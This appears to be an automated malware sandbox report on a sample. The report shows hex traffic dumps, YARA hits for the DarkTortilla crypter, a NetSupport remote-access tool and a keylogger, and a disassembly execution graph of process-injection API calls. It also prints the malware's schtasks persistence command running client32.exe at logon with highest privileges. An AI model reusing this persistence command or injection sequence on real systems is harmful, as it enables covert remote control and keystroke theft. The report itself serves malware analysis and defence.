                                                                                                          2024-12-10 07:58:33 UTC8000INData Raw: 3c 78 45 af 9d 2a 36 9d 4f d6 cd a6 84 55 1c 46 7b b6 54 d4 c7 01 ff 35 e9 fb 88 4f 87 a6 ef cc 72 8a 72 99 8b 0d 40 70 c9 e7 74 7d 14 1b 41 27 e2 10 e8 5b dc e5 92 ff d9 1d 5b 1f 6f 09 ef 92 79 b8 fb cd 83 8d 10 7e 1a c3 f3 90 ae ab 96 24 51 7e 38 1d 96 4c 0c 5f e2 e4 31 0e d0 65 84 79 0f 0c 67 a1 35 44 9b d1 cd e6 9f 99 51 f4 3a a4 e2 6c f9 3b 60 b6 a6 b3 da 73 02 63 dc 16 85 cd 3f dc 5f b1 73 1d 59 6d 76 f7 4f 3b 1a 8b 17 f6 1f f4 4f 82 f9 7b 98 0f 76 df 54 bc 6e 5a 8e 37 97 7b 54 2f ec 98 48 b7 69 f8 a3 de 51 96 1a d5 bd fc a5 42 90 8d dd 4d 37 c0 89 a1 8e 80 09 d4 86 6e c1 08 32 b4 c3 a9 a4 60 2a 10 22 97 5b 69 0b 86 0d d5 ca 26 9a 77 e5 09 ac 4e 85 75 c0 bd 2e 1b af 42 21 b7 50 c8 2c 0c dc c9 cb 56 f4 dc 6e c0 eb 32 58 8f 7e bd 3c b9 5f 12 5c 28 f0
                                                                                                          Data Ascii: <xE*6OUF{T5Orr@pt}A'[[oy~$Q~8L_1eyg5DQ:l;`sc?_sYmvO;O{vTnZ7{T/HiQBM7n2`*"[i&wNu.B!P,Vn2X~<_\(
                                                                                                          2024-12-10 07:58:33 UTC8000INData Raw: 98 f1 e0 99 c0 3c 06 1f 82 35 8e ac dc 59 9c c7 1a 16 52 0a 28 4c 9f 61 05 14 b0 f1 2a 60 a3 c9 fd 3b 73 8f 89 26 06 dc 74 04 6e 3a 00 97 dc 57 7d 08 28 03 23 1a 95 cf 96 e5 4d 84 b5 27 8c f1 41 1e f9 9d 43 c8 41 e8 53 70 b6 33 23 14 36 a7 38 11 f6 7f c6 a8 c4 eb 79 2d 69 4e 90 f7 75 c6 cb fb 8e 26 0d 29 ef 83 d5 1d 00 6b 69 8b e2 e1 dd 92 34 17 62 16 6c 59 01 cf e7 97 7f 89 e2 2f fa 94 6f a6 bc 97 58 d1 2b 1e 98 0a 69 07 0a f0 e9 c3 e7 32 7c 0a 20 6d b8 24 5c ab f2 b5 f3 85 dc a6 60 64 f9 ca 91 bc ef a1 2b 74 dc 2f 15 b1 23 7b 7e 03 e3 af 5c 82 53 39 43 39 8c 11 be e5 2d 51 36 8c 92 b4 67 e9 70 35 80 58 cc 3b 7c ce ed 48 9f 6a e7 e4 aa d7 ed e5 c3 c2 73 50 03 8f d4 01 94 92 34 99 3e b7 c3 68 90 7b 17 3b 18 e8 4a 1b bb d1 63 6f f2 d4 29 70 c4 c4 dc 75 33
                                                                                                          Data Ascii: <5YR(La*`;s&tn:W}(#M'ACASp3#68y-iNu&)ki4blY/oX+i2| m$\`d+t/#{~\S9C9-Q6gp5X;|HjsP4>h{;Jco)pu3
                                                                                                          2024-12-10 07:58:33 UTC8000INData Raw: 7f b8 b4 50 75 69 b4 07 66 75 23 ce aa 65 1f b6 18 97 eb b8 9a 2b a4 54 9a c3 e8 4d 07 27 08 fb 1a c6 39 d6 45 ef 9c 82 15 59 74 64 79 ae 66 33 76 8a 57 3b f5 74 9c 2b 8f 51 04 f1 ad 6a 06 09 a4 56 ad 4e 32 08 c2 a0 f1 1c 28 b3 16 82 b1 02 a7 1b c1 cb b7 06 ac 96 1e a9 62 17 79 35 78 75 6c 79 ca be b1 30 78 9f 56 7c 83 30 57 52 7b 33 ee 48 90 c2 13 2c aa c9 e2 5f 01 02 e3 e2 7d 2b 60 ec 7e 6e 86 0f f1 8e 2a 3e 2d 1e 20 5d 88 bb 5f 8e f7 60 50 61 06 8f d9 1d 94 93 0b 9d 04 09 39 5c 53 71 35 ad c0 49 96 65 73 35 20 2b 15 4b 7b 67 94 3d 11 b8 dd e5 f2 eb a5 e2 d5 0e 37 fa df b3 9c c0 63 38 f7 9b 43 e4 90 68 43 ab fe d3 b4 54 8b fd 09 fd 85 7f d2 1f 33 ca 9e e4 42 c0 6f 60 b1 ca 1f 7b dc f2 7c 28 76 44 2d 06 16 ad ac d8 6f 40 bb 7f ef 38 6e af 7d 75 d3 bb c6
                                                                                                          Data Ascii: Puifu#e+TM'9EYtdyf3vW;t+QjVN2(by5xuly0xV|0WR{3H,_}+`~n*>- ]_`Pa9\Sq5Ies5 +K{g=7c8ChCT3Bo`{|(vD-o@8n}u
                                                                                                          2024-12-10 07:58:33 UTC8000INData Raw: 0a 48 b7 96 7b 5a 6c 09 41 ee d5 5f 24 2c 21 15 90 8b 5a ee e9 b1 25 04 b9 ef 8f 07 64 b2 0a 48 44 cb 7c 57 6c 09 41 e6 89 09 80 98 55 40 7a b5 dc 77 47 73 1b 20 f7 27 17 e3 01 31 ab 4b 28 ba e0 66 24 2e b8 a6 8b 71 80 b4 ab 08 13 5d 14 79 89 8b 62 e3 c5 78 40 7a 87 31 40 58 e8 06 50 de 8e e6 ee 86 ed ce 9b 00 88 3c 8c 01 92 ad e5 b6 46 73 9f 85 dc 33 e2 01 61 27 f3 d3 db 73 b4 cc b3 62 80 40 e6 11 09 80 1c 66 80 a8 0d ed 81 86 b6 4f 7a 13 69 ff 64 d8 9f 30 79 c7 30 ac 52 5b 75 50 64 bb 01 33 69 e4 17 cb 19 59 39 53 b4 dc ea 94 f8 72 ab b1 9c 39 be dc 32 2c 97 c1 ca 65 bd 09 f6 38 65 cd 58 d6 1b c4 b5 a2 e3 42 3f 85 38 40 8b 86 c5 6d 47 c2 a8 17 f4 10 c3 59 cc 84 2c 17 56 d0 0c 0d 21 da c9 b2 e6 a8 7f a5 60 e3 b0 5f 06 df 1d 96 7c a8 29 92 0c c7 1f 5e 4c
                                                                                                          Data Ascii: H{ZlA_$,!Z%dHD|WlAU@zwGs '1K(f$.q]ybx@z1@XP<Fs3a'sb@fOzid0y0R[uPd3iY9Sr92,e8eXB?8@mGY,V!`_|)^L
                                                                                                          2024-12-10 07:58:33 UTC8000INData Raw: 20 66 51 54 9f da 20 68 77 e1 79 78 bb 01 1e 46 78 98 e0 61 86 47 c6 65 f0 f2 91 75 19 e2 03 76 c5 24 65 93 50 df 21 0f 97 85 30 4e 5b 03 2e f9 4a 67 34 8f f0 ce 3a fb 03 96 13 2d a9 86 5a bb de fa 26 c4 94 49 82 00 b6 fb d8 a6 5e 4c 49 76 06 69 cf 7d 03 e4 58 61 7b da 39 0a 94 f5 15 e1 ba dc a6 14 f8 29 da 47 c3 7a 7f 91 d9 81 97 19 69 81 b1 f4 54 9e 65 39 12 ac 30 dd 25 66 c2 d1 9d 7b ae 49 2c 31 4a 0b 86 eb c5 22 73 5e 66 36 5e a1 bd 07 12 4b f5 3e 4b 5b ad 5c e8 9f 5f 11 2a 03 62 5f 29 01 3b 45 ab 02 4a 86 ac 36 33 f7 0c b8 17 72 cb 1f 3d a4 09 b7 26 b1 fa 34 32 90 a9 c5 d0 70 cb 47 b4 3c c2 bb 78 a1 4a 4a 4c db 50 2a f5 e6 84 13 d5 ef 9e 7f 53 51 aa 0f 21 5b a5 ba 73 0f 2a fa c0 84 60 fe b4 ab 40 44 6e a3 0b 37 f9 55 ae fe f8 4b 48 a4 4b 32 e0 e2 3b
                                                                                                          Data Ascii: fQT hwyxFxaGeuv$eP!0N[.Jg4:-Z&I^LIvi}Xa{9)GziTe90%f{I,1J"s^f6^K>K[\_*b_);EJ63r=&42pG<xJJLP*SQ![s*`@Dn7UKHK2;
                                                                                                          2024-12-10 07:58:33 UTC8000INData Raw: 04 3c 3a aa 59 be 54 c6 9a 5b e9 bf 53 f4 df bb ca 00 7d 9d ea ae f5 89 fb 01 44 ec 74 5b 7a c4 c0 2e 6b 8b 70 43 de 74 08 e4 29 8c 07 b7 c0 6e b7 d2 06 5a 36 d7 31 bd 9a fc 79 94 8f 13 46 c3 dd 08 d3 58 fd f8 39 cd 44 66 97 cb 29 7f 0e d4 bf 1d 82 07 d8 76 f1 2e b7 58 ba 5b c9 34 bd c9 f6 9a d1 4b 46 68 6a ae fb d4 42 1e f2 aa b5 e5 b1 59 74 15 d2 71 8b fa bb 1d 75 e9 10 e8 8e 0b 63 e9 5f d0 91 1a 99 f7 c4 e2 c0 f0 bc 07 16 70 35 10 39 c0 5e dd 04 1e f2 ac dd 2b 5f 27 a5 bb 83 af 29 2e 79 0f 65 38 82 af 82 94 d8 7a 95 ab f9 17 9a 2d f0 f4 3f d1 b6 51 b4 6d 12 6d 9b 45 db 56 d1 b6 43 0d d1 5d 28 95 ec f1 eb 9c 34 41 6e 7c 8e 79 fa aa c8 d0 49 81 3d 81 64 29 70 4a 2c 33 8b 65 26 b1 2c 4b 2c cb 16 cb 8c 10 98 09 05 c3 61 3b b8 d3 d7 85 ed 86 9c 6d c3 74 72
                                                                                                          Data Ascii: <:YT[S}Dt[z.kpCt)nZ61yFX9Df)v.X[4KFhjBYtquc_p59^+_').ye8z-?QmmEVC](4An|yI=d)pJ,3e&,K,a;mtr
                                                                                                          2024-12-10 07:58:34 UTC8000INData Raw: b5 98 a0 88 64 96 e7 c4 bb 35 40 db 2e 63 6b 9f 81 44 f7 d5 2d 66 07 0f 7e 2d 7a 08 95 7a 5e 09 a4 c4 2a d4 76 a0 55 5e cb 76 b1 10 6e a7 85 f0 c9 17 09 ea 58 2e d4 b3 19 eb 61 4f be 8e b5 c2 2f 96 e8 65 6b b1 57 5e ba 7e 13 a2 c1 08 d4 5d 2c 36 d4 af 20 4a 0c df 8f 6a bd 18 9e 2f ee 2e c4 61 c0 06 ec 6c 81 08 38 b1 0f 46 e4 d9 4a da 1a 4f 81 81 59 2c 8a 61 ef b1 e6 f4 83 3d 97 be 43 41 cc c3 0e c4 5c 8e 86 1e 32 6a e7 58 73 e0 23 c2 9a eb db 6c ec bb e3 2f a1 1e bf 9d 35 1c 7f b1 c7 37 69 49 fa ae 85 59 26 37 ff d1 bd 51 85 29 f3 52 36 72 dd bb 63 81 7b f7 9e 43 cf 2c b6 fe fa d8 78 7b 04 b7 1c fe c6 a0 84 a8 a7 3f eb a0 55 d0 82 6d 0e d1 33 33 68 28 1e 6d 07 6e 8f e8 2c 12 5f d8 87 7d d0 0b 68 d6 db 98 af 10 06 1e 8b 21 f4 f2 f6 42 2f 9d a2 35 2a d6 31
                                                                                                          Data Ascii: d5@.ckD-f~-zz^*vU^vnX.aO/ekW^~],6 Jj/.al8FJOY,a=CA\2jXs#l/57iIY&7Q)R6rc{C,x{?Um33h(mn,_}h!B/5*1


                                                                                                          Statistics

                                                                                                          CPU Usage

                                                                                                          Click to jump to process

                                                                                                          Memory Usage

                                                                                                          Click to jump to process

                                                                                                          High Level Behavior Distribution

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Behavior

                                                                                                          Click to jump to process

                                                                                                          System Behavior

                                                                                                          General

                                                                                                          Target ID:0
                                                                                                          Start time:02:57:10
                                                                                                          Start date:10/12/2024
                                                                                                          Path:C:\Users\user\Desktop\Jjv9ha2GKn.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\Jjv9ha2GKn.exe"
                                                                                                          Imagebase:0x750000
                                                                                                          File size:1'128'960 bytes
                                                                                                          MD5 hash:AEDF7F67CF6D7F8EF348BA681046FE51
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2759945326.00000000051E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2751641971.00000000027A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:4
                                                                                                          Start time:02:57:48
                                                                                                          Start date:10/12/2024
                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                                          Imagebase:0xa00000
                                                                                                          File size:43'008 bytes
                                                                                                          MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:6
                                                                                                          Start time:02:58:34
                                                                                                          Start date:10/12/2024
                                                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\system32\schtasks.exe" /create /sc ONLOGON /tn "DNScache" /tr "C:\Users\user\AppData\Local\DNScache\client32.exe" /RL HIGHEST
                                                                                                          Imagebase:0x470000
                                                                                                          File size:187'904 bytes
                                                                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:7
                                                                                                          Start time:02:58:34
                                                                                                          Start date:10/12/2024
                                                                                                          Path:C:\Users\user\AppData\Local\DNScache\client32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Users\user\AppData\Local\DNScache\client32.exe
                                                                                                          Imagebase:0x400000
                                                                                                          File size:55'456 bytes
                                                                                                          MD5 hash:9497AECE91E1CCC495CA26AE284600B9
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.3301652835.00000000004D1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.3304754604.000000006CD80000.00000002.00000001.01000000.00000012.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.3304306206.00000000111DC000.00000004.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\DNScache\client32.exe, Author: Joe Security
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 21%, ReversingLabs
                                                                                                          Reputation:moderate
                                                                                                          Has exited:false

                                                                                                          General

                                                                                                          Target ID:8
                                                                                                          Start time:02:58:34
                                                                                                          Start date:10/12/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:9
                                                                                                          Start time:02:58:35
                                                                                                          Start date:10/12/2024
                                                                                                          Path:C:\Users\user\AppData\Local\DNScache\client32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Users\user\AppData\Local\DNScache\client32.exe
                                                                                                          Imagebase:0x400000
                                                                                                          File size:55'456 bytes
                                                                                                          MD5 hash:9497AECE91E1CCC495CA26AE284600B9
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000002.2889855835.00000000111DC000.00000004.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000002.2889815261.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000002.2889815261.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                          Reputation:moderate
                                                                                                          Has exited:true

                                                                                                          Disassembly

                                                                                                          Reset < >

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:20.8%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:3.4%
                                                                                                            Total number of Nodes:473
                                                                                                            Total number of Limit Nodes:15
                                                                                                            execution_graph 74969 a904c8 74970 a904f0 74969->74970 74971 a904e6 74969->74971 74974 a90530 74971->74974 74980 a9051b 74971->74980 74975 a9053e 74974->74975 74977 a9055d 74974->74977 74986 a906a0 74975->74986 74989 a906a8 CloseHandle 74975->74989 74976 a90559 74976->74970 74977->74970 74981 a9053e 74980->74981 74983 a9055d 74980->74983 74984 a906a8 CloseHandle 74981->74984 74985 a906a0 CloseHandle 74981->74985 74982 a90559 74982->74970 74983->74970 74984->74982 74985->74982 74987 a906a8 CloseHandle 74986->74987 74988 a9070f 74987->74988 74988->74976 74990 a9070f 74989->74990 74990->74976 74489 75dded8 74490 75ddf18 ResumeThread 74489->74490 74492 75ddf49 74490->74492 74493 75dc858 74494 75dc89d Wow64GetThreadContext 74493->74494 74496 75dc8e5 74494->74496 74891 75de0f8 74892 75de283 74891->74892 74894 75de11e 74891->74894 74894->74892 74895 75d5888 74894->74895 74896 75de378 PostMessageW 74895->74896 74897 75de3e4 74896->74897 74897->74894 74497 5b986b0 74501 5b987a8 74497->74501 74506 5b98797 74497->74506 74498 5b986bf 74502 5b987b9 74501->74502 74503 5b987dc 74501->74503 74502->74503 74504 5b989e0 GetModuleHandleW 74502->74504 74503->74498 74505 5b98a0d 74504->74505 74505->74498 74508 5b9879b 74506->74508 74507 5b987dc 74507->74498 74508->74507 74509 5b989e0 GetModuleHandleW 74508->74509 74510 5b98a0d 74509->74510 74510->74498 74991 5bc67d0 74992 5bc67f2 74991->74992 74993 5b95d89 CreateWindowExW 74991->74993 74994 5b90230 CreateWindowExW 74991->74994 74993->74992 74994->74992 74511 75dd9d0 74512 75dda18 VirtualProtectEx 74511->74512 74514 75dda56 74512->74514 74898 75ddc70 74899 75ddcb5 Wow64SetThreadContext 74898->74899 74901 75ddcfd 74899->74901 74515 7199e08 74518 7199e1c 74515->74518 74516 7199e58 74517 7199e95 74516->74517 74533 75d21d7 74516->74533 74537 75d19e1 74516->74537 74542 75d2e65 74516->74542 74545 75d3167 74516->74545 74549 75d222c 74516->74549 74553 75d172b 74516->74553 74557 75d23bd 74516->74557 74561 75d18dd 74516->74561 74565 75d1a40 74516->74565 74518->74516 74529 719af50 74518->74529 74530 719af0f VirtualProtect 74529->74530 74532 719af5f 74529->74532 74531 719af22 74530->74531 74531->74518 74532->74518 74569 75d3688 74533->74569 74572 75d3680 74533->74572 74534 75d21eb 74539 75d19d6 74537->74539 74538 75d1a53 74539->74537 74539->74538 74540 75d3688 VirtualProtect 74539->74540 74541 75d3680 VirtualProtect 74539->74541 74540->74538 74541->74538 74543 75d2e71 74542->74543 74544 75d3680 VirtualProtect 74542->74544 74544->74543 74547 75d3688 VirtualProtect 74545->74547 74548 75d3680 VirtualProtect 74545->74548 74546 75d3178 74547->74546 74548->74546 74551 75d3688 VirtualProtect 74549->74551 74552 75d3680 VirtualProtect 74549->74552 74550 75d226a 74551->74550 74552->74550 74555 75d3688 VirtualProtect 74553->74555 74556 75d3680 VirtualProtect 74553->74556 74554 75d173c 74555->74554 74556->74554 74559 75d3688 VirtualProtect 74557->74559 74560 75d3680 VirtualProtect 74557->74560 74558 75d23d7 74559->74558 74560->74558 74563 75d3688 VirtualProtect 74561->74563 74564 75d3680 VirtualProtect 74561->74564 74562 75d1901 74563->74562 74564->74562 74567 75d3688 VirtualProtect 74565->74567 74568 75d3680 VirtualProtect 74565->74568 74566 75d1a53 74567->74566 74568->74566 74570 75d36d0 VirtualProtect 74569->74570 74571 75d370a 74570->74571 74571->74534 74573 75d3683 74572->74573 74574 75d360c 74573->74574 74575 75d36d0 VirtualProtect 74573->74575 74574->74534 74576 75d370a 74575->74576 74576->74534 74995 5b90448 74996 5b9046d 74995->74996 74999 5b900e0 74996->74999 74998 5b9047e 75000 5b900eb 74999->75000 75003 5b901d0 75000->75003 75002 5b92d55 75002->74998 75004 5b901db 75003->75004 75007 5b90200 75004->75007 75006 5b92e3a 75006->75002 75008 5b9020b 75007->75008 75009 5b90230 CreateWindowExW 75008->75009 75010 5b92f3c 75009->75010 75010->75006 75011 5b913ca 75013 5b913da 75011->75013 75012 5b925c2 75013->75012 75016 7b326e8 75013->75016 75021 7b326f8 75013->75021 75017 7b32722 75016->75017 75026 7b39650 75017->75026 75030 7b39640 75017->75030 75018 7b37ebc 75018->75012 75022 7b32722 75021->75022 75024 7b39650 DeleteFileW 75022->75024 75025 7b39640 DeleteFileW 75022->75025 75023 7b37ebc 75023->75012 75024->75023 75025->75023 75036 7b3979c 75026->75036 75041 7b397c8 75026->75041 75027 7b3966a 75027->75018 75031 7b3960e 75030->75031 75032 7b3964e 75030->75032 75031->75018 75033 7b3966a 75032->75033 75034 7b397c8 DeleteFileW 75032->75034 75035 7b3979c DeleteFileW 75032->75035 75033->75018 75034->75033 75035->75033 75037 7b39795 75036->75037 75037->75036 75046 7b39ea8 75037->75046 75050 7b39eb8 75037->75050 75038 7b39a7a 75038->75027 75042 7b397df 75041->75042 75044 7b39eb8 DeleteFileW 75042->75044 75045 7b39ea8 DeleteFileW 75042->75045 75043 7b39a7a 75043->75027 75044->75043 75045->75043 75047 7b39ecf 75046->75047 75054 7b30fa0 75047->75054 75051 7b39ecf 75050->75051 75052 7b30fa0 DeleteFileW 75051->75052 75053 7b3a17c 75052->75053 75053->75038 75055 7b3a218 DeleteFileW 75054->75055 75057 7b3a17c 75055->75057 75057->75038 74902 abd01c 74903 abd034 74902->74903 74904 abd08e 74903->74904 74906 26ffdb8 74903->74906 74907 26ffde5 74906->74907 74908 26ffe17 74907->74908 74913 5bc0040 74907->74913 74918 5bc00e9 74907->74918 74926 5bc0006 74907->74926 74931 5bc010c 74907->74931 74915 5bc0054 74913->74915 74914 5bc00e0 74914->74908 74917 5bc00e9 2 API calls 74915->74917 74937 5bc00f8 74915->74937 74917->74914 74919 5bc00c0 74918->74919 74920 5bc00f2 74918->74920 74924 5bc00f8 2 API calls 74919->74924 74925 5bc00e9 2 API calls 74919->74925 74922 5bc1532 2 API calls 74920->74922 74923 5bc0109 74920->74923 74921 5bc00e0 74921->74908 74922->74923 74923->74908 74924->74921 74925->74921 74927 5bc0040 74926->74927 74929 5bc00f8 2 API calls 74927->74929 74930 5bc00e9 2 API calls 74927->74930 74928 5bc00e0 74928->74908 74929->74928 74930->74928 74932 5bc00ca 74931->74932 74933 5bc011a 74931->74933 74935 5bc00f8 2 API calls 74932->74935 74936 5bc00e9 2 API calls 74932->74936 74934 5bc00e0 74934->74908 74935->74934 74936->74934 74939 5bc0109 74937->74939 74940 5bc1532 74937->74940 74939->74914 74944 5bc1550 74940->74944 74948 5bc1560 74940->74948 74941 5bc154a 74941->74939 74945 5bc155f 74944->74945 74946 5bc15fa CallWindowProcW 74945->74946 74947 5bc15a9 74945->74947 74946->74947 74947->74941 74949 5bc15a2 74948->74949 74951 5bc15a9 74948->74951 74950 5bc15fa CallWindowProcW 74949->74950 74949->74951 74950->74951 74951->74941 75058 5b9aa40 75059 5b9aa86 75058->75059 75063 5b9aff8 75059->75063 75067 5b9b028 75059->75067 75060 5b9ab73 75064 5b9affd 75063->75064 75070 5b99520 75064->75070 75068 5b9b056 75067->75068 75069 5b99520 DuplicateHandle 75067->75069 75068->75060 75069->75068 75071 5b9b090 DuplicateHandle 75070->75071 75072 5b9b056 75071->75072 75072->75060 74577 75dcf40 74578 75dcf80 VirtualAllocEx 74577->74578 74580 75dcfbd 74578->74580 74952 75d5f00 74953 75d5e8e 74952->74953 74954 75d5f0a 74952->74954 74955 75d6371 74954->74955 74957 75d8918 74954->74957 74959 75d893f 74957->74959 74958 75d8a03 74958->74954 74959->74958 74961 75daca0 74959->74961 74962 75dad1f CreateProcessAsUserW 74961->74962 74964 75dae20 74962->74964 74965 75dd280 74966 75dd2c8 WriteProcessMemory 74965->74966 74968 75dd31f 74966->74968 74581 7af19b0 74582 7af196e 74581->74582 74583 7af19be 74581->74583 74584 7af1938 74582->74584 74625 7af1d51 74582->74625 74630 7af1d91 74582->74630 74635 7af1d11 74582->74635 74640 7af1d15 74582->74640 74645 7af1d55 74582->74645 74650 7af1d59 74582->74650 74655 7af1d95 74582->74655 74660 7af1d5d 74582->74660 74665 7af1d19 74582->74665 74670 7af1d41 74582->74670 74675 7af1d1d 74582->74675 74680 7af1d45 74582->74680 74685 7af1d01 74582->74685 74690 7af1d85 74582->74690 74695 7af1d05 74582->74695 74700 7af1d49 74582->74700 74705 7af1dc8 74582->74705 74710 7af1d89 74582->74710 74715 7af1d09 74582->74715 74720 7af1d0d 74582->74720 74725 7af1d4d 74582->74725 74730 7af1d71 74582->74730 74735 7af1d8d 74582->74735 74740 7af1cf5 74582->74740 74745 7af1d31 74582->74745 74750 7af1db8 74582->74750 74755 7af1d35 74582->74755 74760 7af1d39 74582->74760 74765 7af1cf9 74582->74765 74770 7af1d3d 74582->74770 74775 7af1cfd 74582->74775 74780 7af1d21 74582->74780 74785 7af1d61 74582->74785 74790 7af1d25 74582->74790 74795 7af1d65 74582->74795 74800 7af1d29 74582->74800 74805 7af1d69 74582->74805 74810 7af1d2d 74582->74810 74815 7af1d6d 74582->74815 74585 7af199f 74626 7af1d75 74625->74626 74820 5b90230 74626->74820 74825 5b95d89 74626->74825 74627 7af1e2c 74627->74585 74631 7af1d75 74630->74631 74633 5b95d89 CreateWindowExW 74631->74633 74634 5b90230 CreateWindowExW 74631->74634 74632 7af1e2c 74632->74585 74633->74632 74634->74632 74636 7af1d75 74635->74636 74638 5b95d89 CreateWindowExW 74636->74638 74639 5b90230 CreateWindowExW 74636->74639 74637 7af1e2c 74637->74585 74638->74637 74639->74637 74641 7af1d75 74640->74641 74643 5b95d89 CreateWindowExW 74641->74643 74644 5b90230 CreateWindowExW 74641->74644 74642 7af1e2c 74642->74585 74643->74642 74644->74642 74646 7af1d75 74645->74646 74648 5b95d89 CreateWindowExW 74646->74648 74649 5b90230 CreateWindowExW 74646->74649 74647 7af1e2c 74647->74585 74648->74647 74649->74647 74651 7af1d75 74650->74651 74653 5b95d89 CreateWindowExW 74651->74653 74654 5b90230 CreateWindowExW 74651->74654 74652 7af1e2c 74652->74585 74653->74652 74654->74652 74656 7af1d75 74655->74656 74658 5b95d89 CreateWindowExW 74656->74658 74659 5b90230 CreateWindowExW 74656->74659 74657 7af1e2c 74657->74585 74658->74657 74659->74657 74661 7af1d75 74660->74661 74663 5b95d89 CreateWindowExW 74661->74663 74664 5b90230 CreateWindowExW 74661->74664 74662 7af1e2c 74662->74585 74663->74662 74664->74662 74666 7af1d75 74665->74666 74668 5b95d89 CreateWindowExW 74666->74668 74669 5b90230 CreateWindowExW 74666->74669 74667 7af1e2c 74667->74585 74668->74667 74669->74667 74671 7af1d75 74670->74671 74673 5b95d89 CreateWindowExW 74671->74673 74674 5b90230 CreateWindowExW 74671->74674 74672 7af1e2c 74672->74585 74673->74672 74674->74672 74676 7af1d75 74675->74676 74678 5b95d89 CreateWindowExW 74676->74678 74679 5b90230 CreateWindowExW 74676->74679 74677 7af1e2c 74677->74585 74678->74677 74679->74677 74681 7af1d75 74680->74681 74683 5b95d89 CreateWindowExW 74681->74683 74684 5b90230 CreateWindowExW 74681->74684 74682 7af1e2c 74682->74585 74683->74682 74684->74682 74686 7af1d75 74685->74686 74688 5b95d89 CreateWindowExW 74686->74688 74689 5b90230 CreateWindowExW 74686->74689 74687 7af1e2c 74687->74585 74688->74687 74689->74687 74691 7af1d75 74690->74691 74693 5b95d89 CreateWindowExW 74691->74693 74694 5b90230 CreateWindowExW 74691->74694 74692 7af1e2c 74692->74585 74693->74692 74694->74692 74696 7af1d75 74695->74696 74698 5b95d89 CreateWindowExW 74696->74698 74699 5b90230 CreateWindowExW 74696->74699 74697 7af1e2c 74697->74585 74698->74697 74699->74697 74701 7af1d75 74700->74701 74703 5b95d89 CreateWindowExW 74701->74703 74704 5b90230 CreateWindowExW 74701->74704 74702 7af1e2c 74702->74585 74703->74702 74704->74702 74706 7af1df6 74705->74706 74708 5b95d89 CreateWindowExW 74706->74708 74709 5b90230 CreateWindowExW 74706->74709 74707 7af1e2c 74707->74585 74708->74707 74709->74707 74711 7af1d75 74710->74711 74713 5b95d89 CreateWindowExW 74711->74713 74714 5b90230 CreateWindowExW 74711->74714 74712 7af1e2c 74712->74585 74713->74712 74714->74712 74716 7af1d75 74715->74716 